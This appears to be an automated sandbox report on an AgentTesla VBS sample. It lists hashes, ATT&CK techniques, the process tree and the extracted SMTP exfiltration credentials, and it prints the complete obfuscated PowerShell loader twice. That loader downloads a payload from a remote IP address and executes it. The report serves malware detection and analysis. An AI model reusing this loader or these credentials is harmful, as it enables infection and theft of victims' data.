agenttesla | 1618780b8570f9b44fdd73513c6aa8069eb8a9151a22d83b178c5be6eb125013

General

Target

Justificante_01102024.vbs
Size

96KB
MD5

456272f4cfecc56e5c7856bfba2bb77f
SHA1

10b3f7f01cfc05b05910110c93eed15bc294444a
SHA256

1618780b8570f9b44fdd73513c6aa8069eb8a9151a22d83b178c5be6eb125013
SHA512

3aedfbf46d5247c16fda370514d4b847099e89e5cd3695ba947667a7efaf53da217203444a8089f998836770556a79bd2e8b7b4197178bbe5a228c0f3a0b627c
SSDEEP

3072:7pAqCwlpbjrHFYWBxHEQdcpiE07Q/gsUo1wni3:KJw/bjZPbkPpL00/gsUEf

Score

10^/10

agenttesla discovery execution keylogger spyware stealer trojan

Malware Config

Extracted

Family

agenttesla

Credentials

Protocol: smtp
Host:
smtp.yandex.com
Port:
587
Username:
[email protected]
Password:
marcellinus360
Email To:
[email protected]

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla

Blocklisted process makes network request 3 IoCs

flow	pid	Process
4	3016	powershell.exe
6	2600	msiexec.exe
8	2600	msiexec.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2984	powershell.exe
3016	powershell.exe

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
7	api.ipify.org
8	api.ipify.org

Network Service Discovery 1 TTPs 2 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

pid	Process
3016	powershell.exe
2984	powershell.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
2600	msiexec.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2984	powershell.exe
2600	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
3016	powershell.exe
2984	powershell.exe
2984	powershell.exe
2600	msiexec.exe
2600	msiexec.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
2984	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	3016	powershell.exe
Token: SeDebugPrivilege	2984	powershell.exe
Token: SeDebugPrivilege	2600	msiexec.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2600	msiexec.exe

Suspicious use of WriteProcessMemory 11 IoCs

description	pid	Process	procid_target
PID 2496 wrote to memory of 3016	2496	WScript.exe	30
PID 2496 wrote to memory of 3016	2496	WScript.exe	30
PID 2496 wrote to memory of 3016	2496	WScript.exe	30
PID 2984 wrote to memory of 2600	2984	powershell.exe	36
PID 2984 wrote to memory of 2600	2984	powershell.exe	36
PID 2984 wrote to memory of 2600	2984	powershell.exe	36
PID 2984 wrote to memory of 2600	2984	powershell.exe	36
PID 2984 wrote to memory of 2600	2984	powershell.exe	36
PID 2984 wrote to memory of 2600	2984	powershell.exe	36
PID 2984 wrote to memory of 2600	2984	powershell.exe	36
PID 2984 wrote to memory of 2600	2984	powershell.exe	36

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Justificante_01102024.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2496
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Dulses Generalforsamlingsdato Lovlighedens Labbernes #>;$Spond='Fjeldmarkens';<#Overspringende Handelsomstning Snestorms #>;$Krlighedsforholdenes=$host.PrivateData;If ($Krlighedsforholdenes) {$Psykoteknisk++;}function Unabused($Redaktrer){$Fjerbuskenes=$Skibsjournalen+$Redaktrer.Length-$Psykoteknisk;for( $Communalizer=4;$Communalizer -lt $Fjerbuskenes;$Communalizer+=5){$Pomposities='Zapped';$Roskildenseres+=$Redaktrer[$Communalizer];}$Roskildenseres;}function Associationsteknikkerne($Snnekonernes){ & ($Selektionsmekanismerne) ($Snnekonernes);}$Winnie=Unabused 'SterMSar oU.giz Kori.yall Isfl mu a,lac/ Me,5 Ul..navi0B.id Iden(Ka,kWSpiliTremnK okdUndeoCeruwOrgasAnt OutbN SulTUdfo Tria1Kjor0Brdr.Pren0Tr n;Sha, MiljWHjeriKrognSucc6Depr4.res;Pa a Lnpoxs lv6 Men4 Ro ; Syn reperKompvDemi:dolo1Lgeh2Inco1 le.Hand0prop)Me u RaaGarseekrybcScark T tofin./Chik2Fela0Infe1Farv0Infl0 Tai1 Non0Unki1 Cli G.atF Kdsi C lrTru eSundf Le o CamxChry/Aren1Haan2 A k1 kan. Vov0 Pan ';$Troskabens=Unabused ' FruuN,beSMigrEkr grOkay-For A.endg AtoEFlo.NSforTVigt ';$Dyttet=Unabused ' dechBombtUdsttImbepOpeg:Indb/Omde/Isce9Ingo1Avl..Kn p1Spur0 P i9 Pau.Mase2Akt 0Para.Sma.1Bone6Tant1 ,hr/S.raU NomnInsudThrieFnokr Annkscoll LogaKautsKosysSocieUnderEften AleeR te.Abe pMos fA limCyan ';$Manorialize=Unabused 'Poly> kil ';$Selektionsmekanismerne=Unabused 'blueIThe,e earX Fre ';$Endossementet='Waring';$Retorikken='\Udenlandsopholdenes.Fin';Associationsteknikkerne (Unabused ' Vid$Sid gStralBlitoVelvb Fo a Legl Gra: Sk SKo eyDropnuhard Sygi Silku sleKrakruntaeUndfdStowe rgu1Besp1 St,2 Ork= F n$DaimeBegnnTubevFree: Cona Attp earp F sdJubia iltNon,aUnb +Stv.$ FavRP eteEr ot vero ,ear He iTejskUdtykCon e AronOmve ');Associationsteknikkerne (Unabused ' Kol$FondgU smlFemio Vilbp wta.nrilGros:OfteUMai m hefbQuarr KulaGoyae Homn Kiwsse v= P.t$ LatD urnyAuret T,at RineBu.atjern.Forks PolpUdfolDogmiS bct Hyp( Bio$con.MMauha rrn agsoudglrkey,iTrizaStkklJahniBatiz CreePost)synt ');Associationsteknikkerne (Unabused 'Disp[BaldNRejoeTribtExce. Ga.SSu deKn gr edrvInteiStavc GeoeAntiPHalvo umi Ir,nDyppt uteMPap.a MjdnAsm aFootgIndueMedurZabi]Apic: Car:GevaSlan e dilcAl bu PrirMisai Mekt RecySociPKno,r ,ono IketInfeo PercOpteophotlKick Elvr=nove Tmni[HkerNUdspeFanetBevr.BemrSCompeInfrc Lepu D rrRenci ,latTeleyPr,ePElevrEcoro Frat B doSkr,cs naoTreslSamsTGo.syConvpCypreHopp]Bira:tara:MennTBestl Evas Spn1 Ben2 ung ');$Dyttet=$Umbraens[0];$Nonexperimental=(Unabused 'H dr$TeskgnubiLTi bosupebPuttABru lSkna:Vieri dygNLivrD empsAn iMSp dUHogbgArvelTangiRei nT.keGDrkaeAl.iR ntrNRumse,ants,and2Grn 0 For0Conv=InddnDopiEOf ewHete-Grano .olbFl cJDrifEM ssCBarbtCo g BoxsNeueYDataSfristqu deLue m it.CharnJaileUnslt rbe.OpstWCarnEG,vib StvcUnbrLTe nirag EUrtiNHymetOver ');Associationsteknikkerne ($Nonexperimental);Associationsteknikkerne (Unabused ' Byg$G.stI Forn,eskd D rsVis mRytmuHjrngcivilCuckiOu.inRegngZoneetrear QuinEstueProbs ese2Nobb0Wark0 .oi.StavH Sh eIcklaT audAdvieFjerrOutssPige[Syns$LngeTStrirChrooVar.sKurskM era Tr bOp,keRejunDia sGril]re u=,ent$Pan.WLongi rren VirnhreliB taeI de ');$Tegnfejls=Unabused 'Zeph$ AntICompnA end AnosPinamEngluRigsgPleulPs ui ehnAmatgTriceRed rEnten ReseCosssAffa2 Inf0Krum0Paa,. Ud DSteno A twBlnkn Pa l Hjuo SmaaEm.nd GjoFHy.ric tclSulpePull(Fo,m$ SunDdeprySovjt Ru.t A.seAfgit Opl, Sti$KoncM Im emacrtSkataKrbbsforgtSla a orpsUnsciUnduz Rr,eSluksSanh)Co,p ';$Metastasizes=$Syndikerede112;Associationsteknikkerne (Unabused 'Tyks$TampG Ly.lM rgO TilBbeleaRuptL xte:L ppsDanmYI dgN Hydo ,orNInstYO.semJyd ibirikP ed= ork(Ambot RifeDidrsplanTflu -TherPOm nAStertWcerhCurc Ampu$TurmmKalkEOrchTPersaPr,lsSy dtAlp.Ate es HviIUdbeZstateStvlspena)Zeph ');while (!$Synonymik) {Associationsteknikkerne (Unabused ' Dru$ Afkg AntlPedaoRe,pb TilaOve lTran:StueMLavtaTongdUnfrbNet rForsa dekiFeu nBevi=Over$ KoatLat rSti uElv eSupe ') ;Associationsteknikkerne $Tegnfejls;Associationsteknikkerne (Unabused 'WeddS UnptUns,aChicrArbetPote-AethS Budl .okePr feHoolplov, Hav4U,vi ');Associationsteknikkerne (Unabused 'Onde$SupegFr.tlFl soAnsgbRaafaForfl A s:LuksSAdheyOr anLeveoSourn Eg y,dfam Fori FrikA be=Exte(TegnTUdfoeGasssFredtHedy-A odP Re.ahypst Oveh Br Genn$ ruMFe teEndetUdtaaUnc s ud tMo ea rips,seui onszBeste,ndesEnri)Bres ') ;Associationsteknikkerne (Unabused 'Epis$drilgDommlMureoAposbRabuaFdevlrach:InspGAmbroG thrFiskb,nmoeLadytMiti= udv$Gbakg na.lOk aoDiffbS.lia Konl ari:HerrETenatC.ltaGalaaDjvlr Ge sdiskfHy.gdpacssPipeeKlovlPoets Ch.dT icaPseugUstee Pa nMidte oossBldh+ Cli+Frih%Ha j$Fo pU,ithmVan.bForar Q,aa brieTeatnEly,sClem.Paryc stao F luFer nOve,t Fib ') ;$Dyttet=$Umbraens[$Gorbet];}$Retsbeskyttelsesperioden54=286648;$Sprngbombes=29720;Associationsteknikkerne (Unabused 'Be,r$Confg.illlmyopoapotb mpaJohalPunc: nevC.ussobioesMargeBlodi,nknsRigtmProsaForklFors D mk= agl TilsGSp defugutUdhu- ResCDangoSimunmlket BoseTrann UnutGotf Sorb$ RotMC emePalmt SkraReces LumtOpioaPalas UniiUncazMinie F.rsReno ');Associationsteknikkerne (Unabused ' Squ$Hretg C.llhjlaoNonibKiauaFi hl orc:St iAGhe,cPr lcSm du ,onrMoulsEcrae SandGavinPathe,aves SemsStuk2 Ret0Assi3Udan Taa=Bic, No a[ fteSLu by H rs Sstt isteho dm Mis.RaceComlao ButnHuswv awe Os r.oritOkeh] Afs:Exoa:In,eFBioprHydro OvemdrmeBPro a lacsStreeAbor6Ho.o4PaleSD,rmtNaturSus iSpi nNa bg ,ha(Fyrv$PrayC ondoSkygs rinePartiss es BromSkedaRes llamm)Unti ');Associationsteknikkerne (Unabused 'Labi$fab gGin lDrosoForsbSteraUnstlPret:CounG iscySloinVel oOversQuinpBeskoEdgirInteaEuphnProjg triIganuUdlsm Tek Med,=Syne ghet[Fou SOpenyLbn,s Funt GeneT knmdros.statTVeraeFilmxVelvtKokk.IncuE MinnBirkc Smeo SigdToneiVisnn .elgMele]Dark:Skim: onAExprSLnfoCCentIJe cIUdho. AtrGRhabe Nset .enStuattSou.rVotiiMuttnDobbgSlum(A pe$udvaAA,sucUnuscOveru CykrSupesforseBr vdThe nSammeSvensH drsScan2Sona0 .op3Tord)Brst ');Associationsteknikkerne (Unabused 'Fobi$StabgchaulPentoForebPro,aSm rlKa a:LndeKClicr UopiGstesSto tOvereSn rlA tiiMi.agTe rtLaug=Adip$tolnG B gy Agtn.ensoSekss ,unpSersomellrTandaHindn HregpantiUninuDeclm dvi.Plurs,emyuSlotbBonhsTarntPal.rSporiForhnAcq gFobi(Fest$ BriRMidseEnnot Caps Un bAfskeP rusNed k Undy omt Kejt pareTwisl TvisD rfeTufasKo,gpFlo eMo,lrKonfi.edeoLethdGe teAnsln P o5Di.p4Unwr, O t$Par SS ilp arvrL.denSoongAbekbTopeoDannmElevbLykeeJo,nsSeer)U de ');Associationsteknikkerne $Kristeligt;"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Network Service Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3016

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Dulses Generalforsamlingsdato Lovlighedens Labbernes #>;$Spond='Fjeldmarkens';<#Overspringende Handelsomstning Snestorms #>;$Krlighedsforholdenes=$host.PrivateData;If ($Krlighedsforholdenes) {$Psykoteknisk++;}function Unabused($Redaktrer){$Fjerbuskenes=$Skibsjournalen+$Redaktrer.Length-$Psykoteknisk;for( $Communalizer=4;$Communalizer -lt $Fjerbuskenes;$Communalizer+=5){$Pomposities='Zapped';$Roskildenseres+=$Redaktrer[$Communalizer];}$Roskildenseres;}function Associationsteknikkerne($Snnekonernes){ & ($Selektionsmekanismerne) ($Snnekonernes);}$Winnie=Unabused 'SterMSar oU.giz Kori.yall Isfl mu a,lac/ Me,5 Ul..navi0B.id Iden(Ka,kWSpiliTremnK okdUndeoCeruwOrgasAnt OutbN SulTUdfo Tria1Kjor0Brdr.Pren0Tr n;Sha, MiljWHjeriKrognSucc6Depr4.res;Pa a Lnpoxs lv6 Men4 Ro ; Syn reperKompvDemi:dolo1Lgeh2Inco1 le.Hand0prop)Me u RaaGarseekrybcScark T tofin./Chik2Fela0Infe1Farv0Infl0 Tai1 Non0Unki1 Cli G.atF Kdsi C lrTru eSundf Le o CamxChry/Aren1Haan2 A k1 kan. Vov0 Pan ';$Troskabens=Unabused ' FruuN,beSMigrEkr grOkay-For A.endg AtoEFlo.NSforTVigt ';$Dyttet=Unabused ' dechBombtUdsttImbepOpeg:Indb/Omde/Isce9Ingo1Avl..Kn p1Spur0 P i9 Pau.Mase2Akt 0Para.Sma.1Bone6Tant1 ,hr/S.raU NomnInsudThrieFnokr Annkscoll LogaKautsKosysSocieUnderEften AleeR te.Abe pMos fA limCyan ';$Manorialize=Unabused 'Poly> kil ';$Selektionsmekanismerne=Unabused 'blueIThe,e earX Fre ';$Endossementet='Waring';$Retorikken='\Udenlandsopholdenes.Fin';Associationsteknikkerne (Unabused ' Vid$Sid gStralBlitoVelvb Fo a Legl Gra: Sk SKo eyDropnuhard Sygi Silku sleKrakruntaeUndfdStowe rgu1Besp1 St,2 Ork= F n$DaimeBegnnTubevFree: Cona Attp earp F sdJubia iltNon,aUnb +Stv.$ FavRP eteEr ot vero ,ear He iTejskUdtykCon e AronOmve ');Associationsteknikkerne (Unabused ' Kol$FondgU smlFemio Vilbp wta.nrilGros:OfteUMai m hefbQuarr KulaGoyae Homn Kiwsse v= P.t$ LatD urnyAuret T,at RineBu.atjern.Forks PolpUdfolDogmiS bct Hyp( Bio$con.MMauha rrn agsoudglrkey,iTrizaStkklJahniBatiz CreePost)synt ');Associationsteknikkerne (Unabused 'Disp[BaldNRejoeTribtExce. Ga.SSu deKn gr edrvInteiStavc GeoeAntiPHalvo umi Ir,nDyppt uteMPap.a MjdnAsm aFootgIndueMedurZabi]Apic: Car:GevaSlan e dilcAl bu PrirMisai Mekt RecySociPKno,r ,ono IketInfeo PercOpteophotlKick Elvr=nove Tmni[HkerNUdspeFanetBevr.BemrSCompeInfrc Lepu D rrRenci ,latTeleyPr,ePElevrEcoro Frat B doSkr,cs naoTreslSamsTGo.syConvpCypreHopp]Bira:tara:MennTBestl Evas Spn1 Ben2 ung ');$Dyttet=$Umbraens[0];$Nonexperimental=(Unabused 'H dr$TeskgnubiLTi bosupebPuttABru lSkna:Vieri dygNLivrD empsAn iMSp dUHogbgArvelTangiRei nT.keGDrkaeAl.iR ntrNRumse,ants,and2Grn 0 For0Conv=InddnDopiEOf ewHete-Grano .olbFl cJDrifEM ssCBarbtCo g BoxsNeueYDataSfristqu deLue m it.CharnJaileUnslt rbe.OpstWCarnEG,vib StvcUnbrLTe nirag EUrtiNHymetOver ');Associationsteknikkerne ($Nonexperimental);Associationsteknikkerne (Unabused ' Byg$G.stI Forn,eskd D rsVis mRytmuHjrngcivilCuckiOu.inRegngZoneetrear QuinEstueProbs ese2Nobb0Wark0 .oi.StavH Sh eIcklaT audAdvieFjerrOutssPige[Syns$LngeTStrirChrooVar.sKurskM era Tr bOp,keRejunDia sGril]re u=,ent$Pan.WLongi rren VirnhreliB taeI de ');$Tegnfejls=Unabused 'Zeph$ AntICompnA end AnosPinamEngluRigsgPleulPs ui ehnAmatgTriceRed rEnten ReseCosssAffa2 Inf0Krum0Paa,. Ud DSteno A twBlnkn Pa l Hjuo SmaaEm.nd GjoFHy.ric tclSulpePull(Fo,m$ SunDdeprySovjt Ru.t A.seAfgit Opl, Sti$KoncM Im emacrtSkataKrbbsforgtSla a orpsUnsciUnduz Rr,eSluksSanh)Co,p ';$Metastasizes=$Syndikerede112;Associationsteknikkerne (Unabused 'Tyks$TampG Ly.lM rgO TilBbeleaRuptL xte:L ppsDanmYI dgN Hydo ,orNInstYO.semJyd ibirikP ed= ork(Ambot RifeDidrsplanTflu -TherPOm nAStertWcerhCurc Ampu$TurmmKalkEOrchTPersaPr,lsSy dtAlp.Ate es HviIUdbeZstateStvlspena)Zeph ');while (!$Synonymik) {Associationsteknikkerne (Unabused ' Dru$ Afkg AntlPedaoRe,pb TilaOve lTran:StueMLavtaTongdUnfrbNet rForsa dekiFeu nBevi=Over$ KoatLat rSti uElv eSupe ') ;Associationsteknikkerne $Tegnfejls;Associationsteknikkerne (Unabused 'WeddS UnptUns,aChicrArbetPote-AethS Budl .okePr feHoolplov, Hav4U,vi ');Associationsteknikkerne (Unabused 'Onde$SupegFr.tlFl soAnsgbRaafaForfl A s:LuksSAdheyOr anLeveoSourn Eg y,dfam Fori FrikA be=Exte(TegnTUdfoeGasssFredtHedy-A odP Re.ahypst Oveh Br Genn$ ruMFe teEndetUdtaaUnc s ud tMo ea rips,seui onszBeste,ndesEnri)Bres ') ;Associationsteknikkerne (Unabused 'Epis$drilgDommlMureoAposbRabuaFdevlrach:InspGAmbroG thrFiskb,nmoeLadytMiti= udv$Gbakg na.lOk aoDiffbS.lia Konl ari:HerrETenatC.ltaGalaaDjvlr Ge sdiskfHy.gdpacssPipeeKlovlPoets Ch.dT icaPseugUstee Pa nMidte oossBldh+ Cli+Frih%Ha j$Fo pU,ithmVan.bForar Q,aa brieTeatnEly,sClem.Paryc stao F luFer nOve,t Fib ') ;$Dyttet=$Umbraens[$Gorbet];}$Retsbeskyttelsesperioden54=286648;$Sprngbombes=29720;Associationsteknikkerne (Unabused 'Be,r$Confg.illlmyopoapotb mpaJohalPunc: nevC.ussobioesMargeBlodi,nknsRigtmProsaForklFors D mk= agl TilsGSp defugutUdhu- ResCDangoSimunmlket BoseTrann UnutGotf Sorb$ RotMC emePalmt SkraReces LumtOpioaPalas UniiUncazMinie F.rsReno ');Associationsteknikkerne (Unabused ' Squ$Hretg C.llhjlaoNonibKiauaFi hl orc:St iAGhe,cPr lcSm du ,onrMoulsEcrae SandGavinPathe,aves SemsStuk2 Ret0Assi3Udan Taa=Bic, No a[ fteSLu by H rs Sstt isteho dm Mis.RaceComlao ButnHuswv awe Os r.oritOkeh] Afs:Exoa:In,eFBioprHydro OvemdrmeBPro a lacsStreeAbor6Ho.o4PaleSD,rmtNaturSus iSpi nNa bg ,ha(Fyrv$PrayC ondoSkygs rinePartiss es BromSkedaRes llamm)Unti ');Associationsteknikkerne (Unabused 'Labi$fab gGin lDrosoForsbSteraUnstlPret:CounG iscySloinVel oOversQuinpBeskoEdgirInteaEuphnProjg triIganuUdlsm Tek Med,=Syne ghet[Fou SOpenyLbn,s Funt GeneT knmdros.statTVeraeFilmxVelvtKokk.IncuE MinnBirkc Smeo SigdToneiVisnn .elgMele]Dark:Skim: onAExprSLnfoCCentIJe cIUdho. AtrGRhabe Nset .enStuattSou.rVotiiMuttnDobbgSlum(A pe$udvaAA,sucUnuscOveru CykrSupesforseBr vdThe nSammeSvensH drsScan2Sona0 .op3Tord)Brst ');Associationsteknikkerne (Unabused 'Fobi$StabgchaulPentoForebPro,aSm rlKa a:LndeKClicr UopiGstesSto tOvereSn rlA tiiMi.agTe rtLaug=Adip$tolnG B gy Agtn.ensoSekss ,unpSersomellrTandaHindn HregpantiUninuDeclm dvi.Plurs,emyuSlotbBonhsTarntPal.rSporiForhnAcq gFobi(Fest$ BriRMidseEnnot Caps Un bAfskeP rusNed k Undy omt Kejt pareTwisl TvisD rfeTufasKo,gpFlo eMo,lrKonfi.edeoLethdGe teAnsln P o5Di.p4Unwr, O t$Par SS ilp arvrL.denSoongAbekbTopeoDannmElevbLykeeJo,nsSeer)U de ');Associationsteknikkerne $Kristeligt;"
1⤵
- Command and Scripting Interpreter: PowerShell
- Network Service Discovery
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2984
- C:\Windows\syswow64\msiexec.exe
  "C:\Windows\syswow64\msiexec.exe"
  2⤵
  - Blocklisted process makes network request
  - Suspicious use of NtCreateThreadExHideFromDebugger
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  PID:2600

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Network Service Discovery

1

T1046

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\21BBHSGOVG1EAC6DH7UI.temp

Filesize
7KB

MD5
5ac7ac7c0969e12af4a155084d2ea472

SHA1
89f8b8da111964c5aa2c1bd8ce7e40c5a5909f73

SHA256
f99bcf7450916ebfd3919d36455188e647945578746dbf8b69035ef4a749000b

SHA512
86deb4e419562cf93c378c4669d2014a9ab151e48b261433e3cb3aa28f4a621572f8716df2094d69ea9b9d97de124131859462cb4d85c4ac459cb5d0fcb5275a

Download Submit
C:\Users\Admin\AppData\Roaming\Udenlandsopholdenes.Fin

Filesize
411KB

MD5
5b7d242a7b5b4a37c84d10e5e152f968

SHA1
197e08451d9962cb1018324759bc1ebbb4162b7a

SHA256
0307fd03bee806c65f0bdb652edf2529f87cd23d8ec21bb6f9e8688731884d89

SHA512
4b818e126d96d156faf3c353ed07f704f3342938f2c6fde400edd98e77f5560096576bc44c63a7dfb3633e75a63306d100c0d7c96ec41ce5b479e825128fa074

Download Submit
memory/2600-21-0x0000000000AD0000-0x0000000001B32000-memory.dmp

Filesize
16.4MB

Download
memory/2600-22-0x0000000000AD0000-0x0000000000B10000-memory.dmp

Filesize
256KB

Download
memory/2984-20-0x0000000006670000-0x00000000078E7000-memory.dmp

Filesize
18.5MB

Download
memory/3016-8-0x000007FEF5BE0000-0x000007FEF657D000-memory.dmp

Filesize
9.6MB

Download
memory/3016-9-0x000007FEF5BE0000-0x000007FEF657D000-memory.dmp

Filesize
9.6MB

Download
memory/3016-11-0x000007FEF5BE0000-0x000007FEF657D000-memory.dmp

Filesize
9.6MB

Download
memory/3016-13-0x000007FEF5E9E000-0x000007FEF5E9F000-memory.dmp

Filesize
4KB

Download
memory/3016-14-0x000007FEF5BE0000-0x000007FEF657D000-memory.dmp

Filesize
9.6MB

Download
memory/3016-16-0x000007FEF5BE0000-0x000007FEF657D000-memory.dmp

Filesize
9.6MB

Download
memory/3016-10-0x000007FEF5BE0000-0x000007FEF657D000-memory.dmp

Filesize
9.6MB

Download
memory/3016-4-0x000007FEF5E9E000-0x000007FEF5E9F000-memory.dmp

Filesize
4KB

Download
memory/3016-6-0x0000000001E80000-0x0000000001E88000-memory.dmp

Filesize
32KB

Download
memory/3016-7-0x000007FEF5BE0000-0x000007FEF657D000-memory.dmp

Filesize
9.6MB

Download
memory/3016-5-0x000000001B550000-0x000000001B832000-memory.dmp

Filesize
2.9MB

Download

Analysis

Sharing